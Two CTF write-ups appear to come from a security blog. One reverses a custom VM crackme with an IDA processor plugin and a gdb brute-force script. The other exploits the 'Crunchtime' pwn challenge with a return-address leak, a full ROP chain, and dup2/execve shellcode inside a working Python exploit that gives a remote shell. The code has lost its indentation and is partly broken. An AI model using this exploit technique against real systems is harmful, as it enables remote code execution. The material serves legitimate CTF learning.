Another NDH quals another VM wait ...
Last weekend I participated in the Nuit du Hack CTF Quals 2013 with my teamate delroth, you can find an excellent write-up about escaping a Python sandbox on his blog.
So I decided to post a writeup too about the last crackme challenge "Crackme #1".
This Reverse Engineering challenge was a virtual machine, so I decided to reverse the full vm, but today I figured out something ...
Do you remember last ndh prequals ? no no I will not talk about bmp chall but about VMNDH-2k12, it was exactly the same VM (I'm very sad to have lost some hours to reverse something that I know), the only changes was the opcode values, so this post will not deal with the vm stuff you have all the information on this website.
VM Opcode
You can find the vm dump at :
LOAD:000000000048F2E8 vm_dump db 7Fh ;
LOAD:000000000048F2E9 db 45h ; E
LOAD:000000000048F2EA db 4Ch ; L
LOAD:000000000048F2EB db 46h ; F
LOAD:000000000048F2EC db 72h ; r
LOAD:000000000048F2ED db 3
LOAD:000000000048F2EE db 0Ah
Real vm code start at offset 0x06 (byte 0x0A) and the size of the vm code is 0x371 (881 bytes).
Do you want to mary me ?
I love IDA, and I like writting plugins, scripts, processor (when I don't have to reverse IDA for understanding how their api works :p) in python, so after reversing almost the same vm, I decided to write my ndh2k13 processor, here is the code :
from idaapi import *
class DecodingError(Exception):
class NDHProcessor(processor_t):
id = 0x8000 + 5855
cnbits = 8
dnbits = 8
psnames = ["ndh2k13"]
plnames = ["ndh2k13 VM CPU"]
segreg_size = 0
instruc_start = 0
assembler = {
"uflag": 0,
"name": "NDH assembler",
"origin": ".org",
"end": ".end",
"cmnt": ";",
"ascsep": '"',
"accsep": "'",
"esccodes": "\"'",
"a_ascii": ".ascii",
"a_byte": ".byte",
"a_word": ".word",
"a_bss": "dfs %s",
"a_seg": "seg",
"a_curip": "PC",
"a_public": "",
"a_weak": "",
"a_extrn": ".extern",
"a_comdef": "",
"a_align": ".align",
"lbrace": "(",
"rbrace": ")",
"a_mod": "%",
"a_band": "&",
"a_bor": "|",
"a_xor": "^",
"a_bnot": "~",
"a_shl": "<<",
"a_shr": ">>",
"a_sizeof_fmt": "size %s",
reg_names = regNames = [
"R0", "R1", "R2", "R3", "R4",
"R5", "R6", "R7", "SP", "BP",
"CS", "DS"
instruc = instrs = [
{ 'name': 'PUSH', 'feature': CF_USE1 },
{ 'name': 'PUSHB', 'feature': CF_USE1 },
{ 'name': 'PUSHW', 'feature': CF_USE1 },
{ 'name': 'NOP', 'feature': 0 },
{ 'name': 'POP', 'feature': CF_USE1 },
{ 'name': 'MOV', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'MOVB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'MOVW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ADD', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ADDB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ADDW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'SUB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'SUBB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'SUBW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'MUL', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'MULB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'MULW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'DIV', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'DIVB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'DIVW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'INC', 'feature': CF_USE1 },
{ 'name': 'DEC', 'feature': CF_USE1 },
{ 'name': 'OR', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ORB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ORW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'AND', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ANDB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'ANDW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'XOR', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'XORB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'XORW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'NOT', 'feature': CF_USE1 },
{ 'name': 'JZ', 'feature': CF_USE1 },
{ 'name': 'JNZ', 'feature': CF_USE1 },
{ 'name': 'JMPS', 'feature': CF_USE1 | CF_STOP },
{ 'name': 'TEST', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'CMP', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'CMPB', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'CMPW', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'CALL', 'feature': CF_USE1 | CF_CALL },
{ 'name': 'RET', 'feature': CF_STOP },
{ 'name': 'JMPL', 'feature': CF_USE1 | CF_STOP },
{ 'name': 'END', 'feature': CF_STOP },
{ 'name': 'XCHG', 'feature': CF_USE1 | CF_USE2 },
{ 'name': 'JA', 'feature': CF_USE1 },
{ 'name': 'JB', 'feature': CF_USE1 },
{ 'name': 'SYSCALL', 'feature': 0 },
instruc_end = len(instruc)
def __init__(self):
def _init_instructions(self):
self.inames = {}
for idx, ins in enumerate(self.instrs):
self.inames[ins['name']] = idx
def _init_registers(self):
self.reg_ids = {}
for i, reg in enumerate(self.reg_names):
self.reg_ids[reg] = i
self.regFirstSreg = self.regCodeSreg = self.reg_ids["CS"]
self.regLastSreg = self.regDataSreg = self.reg_ids["DS"]
def _read_cmd_byte(self):
ea = self.cmd.ea + self.cmd.size
byte = get_full_byte(ea)
self.cmd.size += 1
return byte
def _read_reg(self):
r = self._read_cmd_byte()
if r >= 0x0A:
raise DecodingError()
return r
def _ana_ntypeinstr(self, name, valid):
cmd = self.cmd
optype = self._read_cmd_byte()
if optype not in valid:
raise DecodingError()
if optype not in (4, 5, 6):
cmd[0].type = o_reg
cmd[0].dtyp = dt_word
cmd[0].reg = self._read_reg()
if optype == 0x0:
cmd.itype = self.inames[name]
cmd[1].type = o_reg
cmd[1].dtyp = dt_word
cmd[1].reg = self._read_reg()
elif optype == 0x1:
cmd.itype = self.inames[name + "B"]
cmd[1].type = o_imm
cmd[1].dtyp = dt_byte
cmd[1].value = self._read_cmd_byte()
elif optype == 0x2:
cmd.itype = self.inames[name + "W"]
cmd[1].type = o_imm
cmd[1].dtyp = dt_word
cmd[1].value = self._read_cmd_byte()
cmd[1].value |= self._read_cmd_byte() << 8
elif optype == 0x3:
cmd.itype = self.inames[name]
elif optype == 0x4:
cmd.itype = self.inames[name + "B"]
cmd[0].type = o_imm
cmd[0].dtyp = dt_byte
cmd[0].value = self._read_cmd_byte()
elif optype == 0x5:
cmd.itype = self.inames[name + "W"]
cmd[0].type = o_imm
cmd[0].dtyp = dt_word
cmd[0].value = self._read_cmd_byte()
cmd[0].value |= self._read_cmd_byte() << 8
elif optype == 0x6:
cmd.itype = self.inames[name + "B"]
cmd[0].type = o_phrase
cmd[0].dtyp = dt_word
cmd[0].reg = self._read_reg()
cmd[1].type = o_reg
cmd[1].dtyp = dt_word
cmd[1].reg = self._read_reg()
elif optype == 0xA:
cmd.itype = self.inames[name]
cmd[1].type = o_phrase
cmd[1].dtyp = dt_word
cmd[1].reg = self._read_reg()
raise DecodingError()
def _ana_one_r(self, name):
cmd = self.cmd
cmd.itype = self.inames[name]
cmd[0].type = o_reg
cmd[0].dtyp = dt_word
cmd[0].reg = self._read_reg()
def _ana_two_r(self, name):
cmd = self.cmd
cmd.itype = self.inames[name]
cmd[0].type = o_reg
cmd[0].dtyp = dt_word
cmd[0].reg = self._read_reg()
cmd[1].type = o_reg
cmd[1].dtyp = dt_word
cmd[1].reg = self._read_reg()
def _ana_jmp(self, name, size=16):
cmd = self.cmd
cmd.itype = self.inames[name]
addr = self._read_cmd_byte()
if size == 16:
addr |= self._read_cmd_byte() << 8
if (addr & 0x8000):
addr -= 0x10000
if addr & 0x80:
addr -= 0x100
addr += cmd.ea + cmd.size
cmd[0].type = o_near
cmd[0].dtyp = dt_word
cmd[0].addr = addr
def _ana(self):
cmd = self.cmd
opcode = self._read_cmd_byte()
if opcode == 0x1F:
self._ana_ntypeinstr("PUSH", valid=(3, 4, 5))
elif opcode == 0x0A:
cmd.itype = self.inames["JMPL"]
elif opcode == 0x1C:
self._ana_ntypeinstr("MOV", valid=(0, 1, 2, 6, 7, 8, 9, 10))
elif opcode == 0x0C:
cmd.itype = self.inames["CALL"]
flags = self._read_cmd_byte()
if flags == 0x4:
addr = self._read_cmd_byte()
addr |= self._read_cmd_byte() << 8
if (addr & 0x8000):
addr -= 0x10000
addr += cmd.ea + cmd.size
cmd[0].type = o_near
cmd[0].dtyp = dt_word
cmd[0].addr = addr
elif flags == 0x3:
reg = self._read_reg()
cmd[0].type = o_reg
cmd[0].dtyp = dt_word
cmd[0].reg = reg
raise DecodingError()
elif opcode == 0x30:
cmd.itype = self.inames["SYSCALL"]
elif opcode == 0x0B:
cmd.itype = self.inames["RET"]
elif opcode == 0x1A:
self._ana_ntypeinstr("SUB", valid=(0, 1, 2))
elif opcode == 0x0D:
self._ana_ntypeinstr("CMP", valid=(0, 1, 2))
elif opcode == 0x11:
elif opcode == 0x09:
cmd.itype = self.inames["END"]
elif opcode == 0x1F:
self._ana_jmp("JMPS", size=8)
elif opcode == 0x17:
elif opcode == 0x10:
elif opcode == 0x16:
elif opcode == 0x13:
self._ana_ntypeinstr("XOR", valid=(0, 1, 2))
elif opcode == 0x0E:
elif opcode == 0x1D:
elif opcode == 0x07:
elif opcode == 0x0F:
self._ana_jmp("JMPS", size=8)
elif opcode == 0x06:
elif opcode == 0x1B:
self._ana_ntypeinstr("ADD", valid=(0, 1, 2))
elif opcode == 0x08:
elif opcode == 0x19:
self._ana_ntypeinstr("MUL", valid=(0, 1, 2))
raise DecodingError()
return cmd.size
def ana(self):
return self._ana()
except DecodingError:
return 0
def _emu_operand(self, op):
if op.type == o_mem:
ua_dodata2(0, op.addr, op.dtyp)
ua_add_dref(0, op.addr, dr_R)
elif op.type == o_near:
if self.cmd.get_canon_feature() & CF_CALL:
fl = fl_CN
fl = fl_JN
ua_add_cref(0, op.addr, fl)
def emu(self):
cmd = self.cmd
ft = cmd.get_canon_feature()
if ft & CF_USE1:
if ft & CF_USE2:
if ft & CF_USE3:
if not ft & CF_STOP:
ua_add_cref(0, cmd.ea + cmd.size, fl_F)
return True
def outop(self, op):
if op.type == o_reg:
elif op.type == o_imm:
OutValue(op, OOFW_IMM)
elif op.type in [o_near, o_mem]:
ok = out_name_expr(op, op.addr, BADADDR)
if not ok:
OutLong(op.addr, 16)
QueueMark(Q_noName, self.cmd.ea)
elif op.type == o_phrase:
return False
return True
def out(self):
cmd = self.cmd
ft = cmd.get_canon_feature()
buf = init_output_buffer(1024)
if ft & CF_USE1:
if ft & CF_USE2:
OutChar(' ')
if ft & CF_USE3:
OutChar(' ')
cvar.gl_comm = 1
return NDHProcessor()
If you have trouble for dumping vm_opcode, you can find the dump here.
Load the vm into IDA, choose "ndh2k13 VM CPU: ndh2k13", when IDA ask you for the memory organisation tell him :
- Loading address : 0x8000
Now you can start reverse :)
We have got only 3 syscall for this version of the vm :
- R0 = 0x01 : exit
- R0 = 0x03 : read
- R0 = 0x04 : write
The code of the vm start here :
ROM:8317 MOVW R0, aPassword
ROM:831C CALL write_msg
ROM:8320 SUBB SP, $20
ROM:8324 MOV R2, SP
ROM:8328 MOVB R1, 0
ROM:832C MOVB R3, $1F
ROM:8330 MOVB R0, $3
ROM:8335 MOV R0, R2
ROM:8339 CALL check_password
And the pseudo - code of the function check_password is :
char *key = 0x8342;
if (strlen(buf_password) == 9) // "\n" include
if (buf_password[0] ^ key[0] == 'S')
if (buf_password[1] ^ key[1] == '[')
if (buf_password[2] ^ key[2] == 'K')
if (buf_password[3] ^ key[3] == ')')
... etc ...
print("GOOD PASSWORD\n")
print("BAD PASSWORD\n")
And the good password is :
key = [0x12, 0x21, 0x02, 0x19, 0x25, 0x34, 0x29, 0x11]
res = ['S', '[', 'K', ')', 'R', 'v', 'Z', 'I']
password = ""
for i in xrange(0, 8):
password += chr(ord(res[i]) ^ key[i])
print password
The flag was 'AzI0wBsX'.
I'm an idiot to reverse an entire vm and not figure out it was the same than last year, but during ctf you want to be the fatest and don't (always) think about old challenges.
Another solution was to count the number of instructions executed by the vm, yeah because when you write crackme, I think you should compute hash, or something like that, because consecutive if statements is just lulz.
Enjoy :
#! /bin/sh
charset="a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
charset="$charset _ - ! $ % ^ \\& \\* + = 0 1 2 3 4 5 6 7 8 9 > < ,"
cat > gdbscript <<EOF
set height 0
define countinstrs
p "instr"
b *0x0000000000400C7F # call handler opcode
run < guess
for c in $charset; do
echo -n "$guess" > guess
echo "AAAAAAA" >> guess
echo -n "trying key `cat guess`... "
gdb ./simple < gdbscript 2>&1 \
| grep '^\$.*= "instr"$' \
| tail -1 \
| cut -d ' ' -f 1 \
| cut -c 2-
First letter :
trying key zAAAAAAA... 245
trying key AAAAAAAA... 252
trying key BAAAAAAA... 245
Edit script for replacing first letter by "A"
trying key AyAAAAAA... 252
trying key AzAAAAAA... 259
trying key AAAAAAAA... 252
And do it for the 8 letters.
Last weekend I participated in the GitS 2013 CTF for team SoSix (team created with my friend @delroth).
Here is my writeup for the pwn400 challenge, called Crunchtime.
Crunchtime is a linux elf64 binary which is an hash generating service.
The binary offers 5 options :
- 1 - AddString
- 2 - PrintString
- 3 - ComputeCRC
- 4 - PrintCRC
- 5 - Exit
This option will ask the user to enter a string, save it in a mallocated buffer, and save the ptr into a pool of 0x64 (100) string table.
If the user has entered more than 0x64 string, it will reset the counter of strings index to 0, and free the old string.
This option asks the user which string number he wants, and print it. This function checks if the number < 0xFF and print the string. Here is the first fail, we can leak some information but there are not really useful.
This option will generate CRC for all the strings entered by the user.
This option will print all CRC computed and the string which is associated.
When the user asks for a new string, a function "CreateNewString" (Offset : ImageBase + 0xEC0) is called, this function has the following stack frame :

But when the user is asked for a new string, it will read 0x221 bytes or read until finding 0x0A ("\n").
So we can overwrite the low byte of the return adress of this function, and the saved rbp rbx and rflags registers pushed before the call.
We will have to find good gadget between return_address00 and return_adressFF, and if we look deeper the disassembly before the call fo "CreateNewString" :
We can see that before the call, we can find a push rbx (0x00007FFFF7FFDF4B), and we know that we can control rbx.
So if we overwrite low byte of the return address with 0x4B, it will push a value on the stack, and ask us again to enter a string and re-trigger the vuln.
Let's see an example :
- User ask for a new string
- User enter the string : "A" * 0x220 + "\x4B"
- Saved RBX = 0x4242424242424242
- Saved RBP = 0x4242424242424242
- Saved RFLAGS = 0x4242424242424242
- ReturnAddress low byte = 0x4B instead of in our case 0x80
- The value of our saved RBX will be pushed on the stack before calling CreateNewString
- User enters a new string : "A" * 0x200 + "\xA1" (0x00007FFFF7FFDFA1 == "retn")
- ReturnAddress will point to a retn instruction, and then retn to our 0x4242424242424242
Now we can control full of rip.
> readelf -a ./crunchtime-f3b872bbfd3caa9f9b4013beb399106bfcb8ac50 | grep -A1 GNU_STACK
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RW 8
The stack is not executable so we will have to do some ROP.
But there is another problem :)
> readelf -h ./crunchtime-f3b872bbfd3caa9f9b4013beb399106bfcb8ac50 | grep Type
Type: DYN (Shared object file)
The binary is of type shared object, so each time it will be executed the BaseAddress will not be the same, so the address of our gadgets will change !
We will have to find a way to leak information, especially one which help us to construct our rop payload.
Here is the pseudo-code of the function "CreateNewString" :
size = ReadUntil(fd, buffer, 0x221, 0x0A);
if (buffer[size] == 0x0A)
buffer[size] = 0;
memcpy(malloc(strlen(buffer)), buffer, strlen(buffer));
If the buffer doesn't end with "\n", no null byte will be put at the end of the new string, so when strlen will be called, it will go after the saved rbx, rbp, rflags, and stop at the return adress which contains a null byte in the high byte, so we can leak the return adress and we can know where our binary is loaded.
Let's see with an example, for avoiding problems saved rflags are set to 0x0202020202020202 :
> perl -e'print "1\n" . "A"x536 . "\x02"x8 . "\x80" . "2\n0\n5\n"' | nc localhost 10100 | hexdump -C
00000000 53 65 6c 65 63 74 20 61 6e 20 6f 70 74 69 6f 6e |Select an option|
00000010 3a 0a 20 20 31 2e 20 41 64 64 20 73 74 72 69 6e |:. 1. Add strin|
00000020 67 0a 20 20 32 2e 20 50 72 69 6e 74 20 73 74 72 |g. 2. Print str|
00000030 69 6e 67 0a 20 20 33 2e 20 47 65 6e 65 72 61 74 |ing. 3. Generat|
00000040 65 20 43 52 43 73 0a 20 20 34 2e 20 50 72 69 6e |e CRCs. 4. Prin|
00000050 74 20 43 52 43 73 0a 20 20 35 2e 20 45 78 69 74 |t CRCs. 5. Exit|
00000060 0a 4e 65 77 20 73 74 72 69 6e 67 3a 20 53 65 6c |.New string: Sel|
00000070 65 63 74 20 61 6e 20 6f 70 74 69 6f 6e 3a 0a 20 |ect an option:. |
00000080 20 31 2e 20 41 64 64 20 73 74 72 69 6e 67 0a 20 | 1. Add string. |
00000090 20 32 2e 20 50 72 69 6e 74 20 73 74 72 69 6e 67 | 2. Print string|
000000a0 0a 20 20 33 2e 20 47 65 6e 65 72 61 74 65 20 43 |. 3. Generate C|
000000b0 52 43 73 0a 20 20 34 2e 20 50 72 69 6e 74 20 43 |RCs. 4. Print C|
000000c0 52 43 73 0a 20 20 35 2e 20 45 78 69 74 0a 57 68 |RCs. 5. Exit.Wh|
000000d0 69 63 68 20 73 74 72 69 6e 67 20 6e 75 6d 62 65 |ich string numbe|
000000e0 72 20 64 6f 20 79 6f 75 20 77 61 6e 74 3f 0a 53 |r do you want?.S|
000000f0 74 72 69 6e 67 20 30 20 2d 20 41 41 41 41 41 41 |tring 0 - AAAAAA|
00000100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
00000310 41 41 02 02 02 02 02 02 02 02 80 9f 40 4e fa 7f |AA..........@N..|
00000320 0a 53 65 6c 65 63 74 20 61 6e 20 6f 70 74 69 6f |.Select an optio|
00000330 6e 3a 0a 20 20 31 2e 20 41 64 64 20 73 74 72 69 |n:. 1. Add stri|
00000340 6e 67 0a 20 20 32 2e 20 50 72 69 6e 74 20 73 74 |ng. 2. Print st|
00000350 72 69 6e 67 0a 20 20 33 2e 20 47 65 6e 65 72 61 |ring. 3. Genera|
00000360 74 65 20 43 52 43 73 0a 20 20 34 2e 20 50 72 69 |te CRCs. 4. Pri|
00000370 6e 74 20 43 52 43 73 0a 20 20 35 2e 20 45 78 69 |nt CRCs. 5. Exi|
00000380 74 0a |t.|
As you can see after the repeated "A" we can see the return adress : 0x7ffa4e409f80.
Now we are able to compute address of each gadgets with this leak, the rop payload is same as usual, we leak information from glibc, call mmap(RWX), recv into the new RWX zone and call it.
Just a thing, the only way I found to set rsi to the value I want (rsi is used as buffer parameter for recv() and send()), is to jump into the middle of a function and use this gadget :
00007FFFF7FFE3F0 mov rsi, r12
It calls recv() just after, so be careful.
I didn't find any shellcode with dup2 and execve, so I wrote it :
; dup2(4, 2)
; dup2(4, 1)
; dup2(4, 0)
; execve("/bin/sh")
push 0x04
pop rdi
push 0x21
pop rax
push 0x2
pop rsi
dec rsi
push 0x21
pop rax
dec rsi
push 0x21
pop rax
xor rdx, rdx
mov rbx, 0x68732f6e69622fff
shr rbx, 0x8
push rbx
mov rdi, rsp
xor rax, rax
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
import socket
import struct
import sys
def leak_return_addr(s):
s.recv(97) # recv menu
s.recv(12) # recv new str
buf = "A" * 520 + "A" * 8 + "A" * 8 + "\x02" * 8 + "\x80"
buf = s.recv(562)
leak = buf[-7:-1] + "\x00" * 2
addr_leak = struct.unpack("<Q", leak)[0]
return addr_leak
def stage1(s, addr_return, fd):
gadgets = [
struct.pack("<Q", addr_return + 0x278), # pop rdx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x7E5), # pop r12 ; ret
struct.pack("<Q", addr_return + 0x2020a8), # .got.plt send()
struct.pack("<Q", addr_return + 0x680), # pop rcx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x50D), # pop r13; pop r14 ; ret
struct.pack("<Q", fd),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x470), # mov rsi, r12
struct.pack("<Q", 0x0), # pop r10
struct.pack("<Q", 0x0), # pop rbx
struct.pack("<Q", 0x0), # pop rbp
struct.pack("<Q", 0x0), # pop r12
struct.pack("<Q", 0x0), # pop r13
struct.pack("<Q", addr_return + 0x40), # xor eax, eax ; pop rdi ; retn
struct.pack("<Q", fd),
struct.pack("<Q", addr_return + 0x278), # pop rdx;pop rbx; poprbp;ret
struct.pack("<Q", 0x00000000000000008),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x680), # pop rcx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return - 0x230), # send()
struct.pack("<Q", addr_return + 0x50F), # pop r14; ret
struct.pack("<Q", fd),
struct.pack("<Q", addr_return - 0x8), # re triger vuln
# 00007FFFF7FFDF4B push rbx
# [ RBX ] [ RBP ] [ EFLAGS]
buf = "A" + "\x00" * 519 + struct.pack("<Q", 0) + struct.pack("<Q", 0) + struct.pack("<Q", 0x0) + "\x4B"
for i in gadgets:
buf = "A" + "\x00" * 519 + i + struct.pack("<Q", 0) + struct.pack("<Q", 0x0) + "\x4B"
# 00007FFFF7FFDFA1 retn
buf = "A" + "\x00" * 519 + struct.pack("<Q", 0x0) + struct.pack("<Q", 0) + struct.pack("<Q", 0x0) + "\xA1"
leak_send = s.recv(8)
send_addr = struct.unpack("<Q", leak_send)[0]
print "[+] Send() @ = ", hex(send_addr)
stage2(s, addr_return, fd, send_addr)
def stage2(s, addr_return, fd, send_addr):
gadgets = [
struct.pack("<Q", addr_return + 0x7E5), # pop r12 ; ret
struct.pack("<Q", 0x1000), # r12 = ....
struct.pack("<Q", addr_return + 0x680), # pop rcx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x50D), # pop r13; pop r14 ; ret
struct.pack("<Q", fd),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x470), # mov rsi, r12
struct.pack("<Q", 0x0), # pop r10
struct.pack("<Q", 0x0), # pop rbx
struct.pack("<Q", 0x0), # pop rbp
struct.pack("<Q", 0x0), # pop r12
struct.pack("<Q", 0x0), # pop r13
struct.pack("<Q", addr_return + 0x40), # xor eax, eax ; pop rdi ; retn
struct.pack("<Q", 0x13370000),
struct.pack("<Q", addr_return + 0x680), # pop rcx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000031),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x278), # pop rdx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000007),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", send_addr - 0x51e0 ), # mmap()
struct.pack("<Q", addr_return + 0x7E5), # pop r12 ; ret
struct.pack("<Q", 0x13370000), # r12 = ....
struct.pack("<Q", addr_return + 0x680), # pop rcx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x50D), # pop r13; pop r14 ; ret
struct.pack("<Q", fd),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x470), # mov rsi, r12
struct.pack("<Q", 0x0), # pop r10
struct.pack("<Q", 0x0), # pop rbx
struct.pack("<Q", 0x0), # pop rbp
struct.pack("<Q", 0x0), # pop r12
struct.pack("<Q", 0x0), # pop r13
struct.pack("<Q", addr_return + 0x278), # pop rdx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x1000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return + 0x42), # pop rdi ; ret
struct.pack("<Q", fd),
struct.pack("<Q", addr_return + 0x680), # pop rcx; pop rbx; pop rbp; ret
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", 0x00000000000000000),
struct.pack("<Q", addr_return - 0x270), # recv()
struct.pack("<Q", 0x13370000), # r12 = ....
struct.pack("<Q", addr_return - 0x110), # exit DBG
buf = "A" + "\x00" * 518 + struct.pack("<Q", 0) + struct.pack("<Q", 0) + struct.pack("<Q", 0x0) + "\x4B"
for i in gadgets:
buf = "A" + "\x00" * 519 + i + struct.pack("<Q", 0) + struct.pack("<Q", 0x0) + "\x4B"
buf = "A" + "\x00" * 519 + struct.pack("<Q", 0x0) + struct.pack("<Q", 0) + struct.pack("<Q", 0x0) + "\xA1"
shellcode = "\x6a\x04\x5f\x6a\x21\x58\x6a\x02\x5e\x0f\x05\x48\xff\xce\x6a\x21\x58\x0f\x05\x48\xff\xce\x6a\x21\x58\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05" + "\x90" * 50
payload = "\x90" * (4096 - len(shellcode)) + shellcode
def enjoyshell(s):
while True:
print ">",
cmd = raw_input()
if not cmd:
s.send(cmd + "\n")
sys.stdout.write(s.recv(65536) + "\n")
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 10100))
addr_return = leak_return_addr(s)
print "[+] Addr leak = ", hex(addr_return)
stage1(s, addr_return, 4)
if __name__ == '__main__':
Pages : 1